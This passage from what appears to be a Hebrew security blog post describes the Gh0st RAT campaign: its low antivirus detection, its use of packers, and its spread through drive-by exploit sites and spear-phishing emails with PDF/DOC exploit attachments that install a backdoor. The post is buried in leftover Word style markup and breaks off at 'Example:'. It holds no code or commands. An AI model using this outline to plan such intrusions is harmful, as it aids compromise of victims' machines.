SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 1" /> <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision" /> <w:LsdException Locked="false" Priority="34" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="List Paragraph" /> <w:LsdException Locked="false" Priority="29" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Quote" /> <w:LsdException Locked="false" Priority="30" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Intense Quote" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 1" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 1" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 1" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 1" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 1" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 2" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 2" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 2" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 2" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 2" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 2" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 2" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 2" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 2" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 3" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 3" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 3" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 3" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 3" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 3" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 3" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 3" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 3" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 4" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 4" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 4" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 4" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 4" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 4" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 4" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 4" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 4" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 5" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 5" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 5" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 5" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 5" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 5" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 5" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 5" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 5" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 6" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 6" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 6" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 6" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 6" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 6" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 6" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 6" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 6" /> <w:LsdException Locked="false" Priority="19" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis" /> <w:LsdException Locked="false" Priority="21" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis" /> <w:LsdException Locked="false" Priority="31" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference" /> <w:LsdException Locked="false" Priority="32" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Intense Reference" /> <w:LsdException Locked="false" Priority="33" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Book Title" /> <w:LsdException Locked="false" Priority="37" Name="Bibliography" /> <w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading" /> </w:LatentStyles> </xml><![endif]--> <!--[if gte mso 10]><br />
<mce:style><!   /* Style Definitions */  table.MsoNormalTable 	{mso-style-name:"Table Normal"; 	mso-tstyle-rowband-size:0; 	mso-tstyle-colband-size:0; 	mso-style-noshow:yes; 	mso-style-priority:99; 	mso-style-qformat:yes; 	mso-style-parent:""; 	mso-padding-alt:0cm 5.4pt 0cm 5.4pt; 	mso-para-margin:0cm; 	mso-para-margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:10.0pt; 	font-family:"Calibri","sans-serif";} --></p>
<p><!--[endif]--></p>
<p class="MsoNormal" dir="rtl"><span style="text-decoration: underline;"><span style="font-family: &quot;Arial&quot;,&quot;sans-serif&quot;;" lang="HE">הגרסה המדוברת של </span></span><span style="text-decoration: underline;"><span dir="ltr">Gh0st RAT</span></span><span style="text-decoration: underline;"><span style="font-family: &quot;Arial&quot;,&quot;sans-serif&quot;;" lang="HE"> זוהתה ע&quot;י 11 מתוך 34 האנטי וירוסים</span></span><span style="font-family: &quot;Arial&quot;,&quot;sans-serif&quot;;" lang="HE"> באתר <a href="http://www.virustotal.com" target="_blank">וירוס טוטאל</a> (אתר שבודק דגימות קבצים ומשווה אותם לחתימות של אנטי וירוסים).</span></p>
<p class="MsoNormal" dir="rtl"><span style="font-family: &quot;Arial&quot;,&quot;sans-serif&quot;;" lang="HE">התוקפים השתמשו ב<a href="http://en.wikipedia.org/wiki/Runtime_packer#List_of_packers" target="_blank">פאקרים</a> כדי להחביא את הקוד שלהם ולא להתגלות ע&quot;י אנטי וירוסים והפעילו כנראה <span style="text-decoration: underline;">שמונה גרסאות של סוסים</span>.</span></p>
<p class="MsoNormal" dir="rtl">
<p class="MsoNormal" dir="rtl"><span style="font-family: &quot;Arial&quot;,&quot;sans-serif&quot;;" lang="HE"><img class="aligncenter size-full wp-image-1025" title="gr2" src="http://www.hacking.org.il/wp-content/uploads/2009/05/gr2.jpg" alt="gr2" width="624" height="225" /></span><!--[if gte mso 9]><xml> <w:WordDocument> <w:View>Normal</w:View> <w:Zoom>0</w:Zoom> <w:TrackMoves /> <w:TrackFormatting /> <w:PunctuationKerning /> <w:ValidateAgainstSchemas /> <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid> <w:IgnoreMixedContent>false</w:IgnoreMixedContent> <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText> <w:DoNotPromoteQF /> <w:LidThemeOther>EN-US</w:LidThemeOther> <w:LidThemeAsian>X-NONE</w:LidThemeAsian> <w:LidThemeComplexScript>HE</w:LidThemeComplexScript> <w:Compatibility> <w:BreakWrappedTables /> <w:SnapToGridInCell /> <w:WrapTextWithPunct /> <w:UseAsianBreakRules /> <w:DontGrowAutofit /> <w:SplitPgBreakAndParaMark /> <w:DontVertAlignCellWithSp /> <w:DontBreakConstrainedForcedTables /> <w:DontVertAlignInTxbx /> <w:Word11KerningPairs /> <w:CachedColBalance /> </w:Compatibility> <w:BrowserLevel>MicrosoftInternetExplorer4</w:BrowserLevel> <m:mathPr> <m:mathFont m:val="Cambria Math" /> <m:brkBin m:val="before" /> <m:brkBinSub m:val="&#45;-" /> <m:smallFrac m:val="off" /> <m:dispDef /> <m:lMargin m:val="0" /> <m:rMargin m:val="0" /> <m:defJc m:val="centerGroup" /> <m:wrapIndent m:val="1440" /> <m:intLim m:val="subSup" /> <m:naryLim m:val="undOvr" /> </m:mathPr></w:WordDocument> </xml><![endif]--><!--[if gte mso 9]><xml> <w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"   DefSemiHidden="true" DefQFormat="false" DefPriority="99"   LatentStyleCount="267"> <w:LsdException Locked="false" Priority="0" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Normal" /> <w:LsdException Locked="false" Priority="9" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="heading 1" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8" /> <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9" /> <w:LsdException Locked="false" Priority="39" Name="toc 1" /> <w:LsdException Locked="false" Priority="39" Name="toc 2" /> <w:LsdException Locked="false" Priority="39" Name="toc 3" /> <w:LsdException Locked="false" Priority="39" Name="toc 4" /> <w:LsdException Locked="false" Priority="39" Name="toc 5" /> <w:LsdException Locked="false" Priority="39" Name="toc 6" /> <w:LsdException Locked="false" Priority="39" Name="toc 7" /> <w:LsdException Locked="false" Priority="39" Name="toc 8" /> <w:LsdException Locked="false" Priority="39" Name="toc 9" /> <w:LsdException Locked="false" Priority="35" QFormat="true" Name="caption" /> <w:LsdException Locked="false" Priority="10" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Title" /> <w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font" /> <w:LsdException Locked="false" Priority="11" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Subtitle" /> <w:LsdException Locked="false" Priority="22" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Strong" /> <w:LsdException Locked="false" Priority="20" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Emphasis" /> <w:LsdException Locked="false" Priority="59" SemiHidden="false"    UnhideWhenUsed="false" Name="Table Grid" /> <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text" /> <w:LsdException Locked="false" Priority="1" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="No Spacing" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 1" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 1" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 1" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 1" /> <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision" /> <w:LsdException Locked="false" Priority="34" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="List Paragraph" /> <w:LsdException Locked="false" Priority="29" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Quote" /> <w:LsdException Locked="false" Priority="30" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Intense Quote" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 1" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 1" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 1" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 1" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 1" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 2" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 2" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 2" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 2" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 2" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 2" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 2" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 2" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 2" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 3" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 3" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 3" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 3" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 3" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 3" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 3" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 3" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 3" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 4" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 4" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 4" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 4" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 4" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 4" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 4" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 4" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 4" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 5" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 5" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 5" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 5" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 5" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 5" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 5" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 5" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 5" /> <w:LsdException Locked="false" Priority="60" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Shading Accent 6" /> <w:LsdException Locked="false" Priority="61" SemiHidden="false"    UnhideWhenUsed="false" Name="Light List Accent 6" /> <w:LsdException Locked="false" Priority="62" SemiHidden="false"    UnhideWhenUsed="false" Name="Light Grid Accent 6" /> <w:LsdException Locked="false" Priority="63" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6" /> <w:LsdException Locked="false" Priority="64" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6" /> <w:LsdException Locked="false" Priority="65" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 1 Accent 6" /> <w:LsdException Locked="false" Priority="66" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium List 2 Accent 6" /> <w:LsdException Locked="false" Priority="67" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6" /> <w:LsdException Locked="false" Priority="68" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6" /> <w:LsdException Locked="false" Priority="69" SemiHidden="false"    UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6" /> <w:LsdException Locked="false" Priority="70" SemiHidden="false"    UnhideWhenUsed="false" Name="Dark List Accent 6" /> <w:LsdException Locked="false" Priority="71" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Shading Accent 6" /> <w:LsdException Locked="false" Priority="72" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful List Accent 6" /> <w:LsdException Locked="false" Priority="73" SemiHidden="false"    UnhideWhenUsed="false" Name="Colorful Grid Accent 6" /> <w:LsdException Locked="false" Priority="19" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis" /> <w:LsdException Locked="false" Priority="21" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis" /> <w:LsdException Locked="false" Priority="31" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference" /> <w:LsdException Locked="false" Priority="32" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Intense Reference" /> <w:LsdException Locked="false" Priority="33" SemiHidden="false"    UnhideWhenUsed="false" QFormat="true" Name="Book Title" /> <w:LsdException Locked="false" Priority="37" Name="Bibliography" /> <w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading" /> </w:LatentStyles> </xml><![endif]--></p>
<p><!--[endif]--></p>
<p>ההתפשטות:</p>
<p>1. בעזרת אתר אינטרנט המכיל אקספלויט שמדביק את המחשבים שביקרו בו.</p>
<p>2. בעזרת מיילים רלוונטיים ליעד. המייל מכיל Attachment שמכיל אקספלויט של PDF ו-DOC כשה-Payload הוא BackDoor שמתחבר ל-control server וממתין להוראות. לאחר ההדבקה התוקף מורה למחשב הנתקף להוריד טרויאן.</p>
<p class="MsoNormal" dir="rtl"><span style="font-family: &quot;Arial&quot;,&quot;sans-serif&quot;;" lang="HE">דוגמה:</span></p>
